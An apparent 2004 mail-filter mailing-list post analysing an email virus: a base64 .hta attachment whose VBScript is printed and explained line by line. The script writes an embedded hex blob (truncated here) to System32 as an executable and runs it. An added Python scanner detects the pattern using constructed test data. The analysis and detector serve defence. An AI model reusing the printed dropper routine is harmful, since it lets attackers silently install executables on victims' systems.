[Mimedefang] base64-encoded vbscript .hta file with self-extracting embedded virus
Royce Williams
royce.williams at acsalaska.net
Wed Jan 21 17:34:02 EST 2004
Our customer base got hit today with a virus that slipped through
via some wily obfuscation that I hadn't seen before. What it does,
in a nutshell, is a base64-encoded .hta file that has VBScript in it
to convert a long string of hex into a binary, store it in your
system32 directory, and run it. Full explication below (courtesy
of a VB guy in my office).
I'm running MIMEDefang 2.37, spamassassin 2.61,
clamav 0.60 and File::Scan 0.78, on FreeBSD 4.8.
Did I miss a thread on this, or has anyone seen it?
1. szBinary =
"4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000
E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D"
[ rest of hex redacted]
2. set WshShell = CreateObject("WScript.Shell")
3. set WshEnv = WshShell.Environment("Process")
4. szApplication = WshEnv("SystemRoot")&"\System32\usb_d2.exe"
5. Set hFSO = CreateObject("Scripting.FileSystemObject")
6. Set hFile = hFSO.CreateTextFile(szApplication, true)
7. intLength = len(szBinary)
8. intPosition = 1
9. while intPosition < intLength
10. char = Int("&H" & Mid(szBinary, intPosition, 2))
11. hFile.Write(Chr(char))
12. intPosition = intPosition+2
13. wend
14. hFile.Close
15. Set hShell=CreateObject("WScript.Shell")
16. hShell.run(szApplication)
1. Stores the hex values in a text string
2. Fires up the DOS shell
3. Find out where your system folder is
4. create a "text" file in your system32 folder named "usb_d2.exe"
(could be randomized)
5. Fire up the FileSystem Object (to manipulate files)
6. open the "text" file for writing (the true)
7. find out how long the string is
8. set the position to the first character
9. while not end-of-string
10. find the hex value of the next two characters
11. write the character that is represented by the hex value to the
text file
12. go to the next set of hex characters
13. end while loop
14. close the file
15. open the DOS shell again (sloppy code, they can reuse the first one)
16. execute the file
-royce
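A defender-side check for the dropper pattern described in this post, added here as an example; it is not part of Royce's message or of MIMEDefang, and the .hta bodies it scans are constructed test data. It base64-decodes an .hta attachment body, joins VBScript string literals split with `& _`, and flags both the `Int("&H" & Mid(...))` hex-to-byte loop and any long hex literal that decodes to an MZ (PE) header.

```python
import base64
import re

# Constructed test data (not from the original post): a minimal .hta body using
# the same hex-string dropper pattern; only the first PE header bytes are kept.
PE_HEADER_HEX = "4D5A90000300000004000000FFFF0000B800000000000000"
MALICIOUS_HTA = (
    '<script language="VBScript">\r\n'
    'szBinary = "%s" & _\r\n'
    '           "%s"\r\n'
    'Set hFile = hFSO.CreateTextFile(szApplication, true)\r\n'
    'char = Int("&H" & Mid(szBinary, intPosition, 2))\r\n'
    'hFile.Write(Chr(char))\r\n'
    '</script>'
) % (PE_HEADER_HEX[:24], PE_HEADER_HEX[24:])
BENIGN_HTA = '<script language="VBScript">MsgBox "hello"</script>'
MALICIOUS_B64 = base64.b64encode(MALICIOUS_HTA.encode()).decode()
BENIGN_B64 = base64.b64encode(BENIGN_HTA.encode()).decode()

# The "&H" prefix fed by a two-character Mid() walk: the hex-to-byte loop.
HEX_LOOP = re.compile(r'"&H"\s*&\s*Mid\s*\(', re.IGNORECASE)
# A string literal made only of hex digit pairs, at least 16 bytes long.
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){16,})"')
# Joins "ABCD" & _ <newline> "EF01" (and plain "AB" & "CD") into one literal,
# so splitting the blob across lines does not defeat the length threshold.
CONCAT = re.compile(r'"\s*&\s*(?:_\s*)?"')

def decoded_hex_literals(script):
    """Return the bytes encoded by every long hex string literal in the script."""
    joined = CONCAT.sub('', script)
    return [bytes.fromhex(m.group(1)) for m in HEX_LITERAL.finditer(joined)]

def analyse_hta(b64_body):
    """Decode a base64 .hta attachment body and return a list of findings."""
    script = base64.b64decode(b64_body).decode('latin-1')
    findings = []
    if HEX_LOOP.search(script):
        findings.append('vbscript &H/Mid hex-to-binary loop')
    for blob in decoded_hex_literals(script):
        if blob.startswith(b'MZ'):
            findings.append('hex literal decodes to a PE (MZ) executable')
    return findings

if __name__ == '__main__':
    print(analyse_hta(MALICIOUS_B64))
    print(analyse_hta(BENIGN_B64))
```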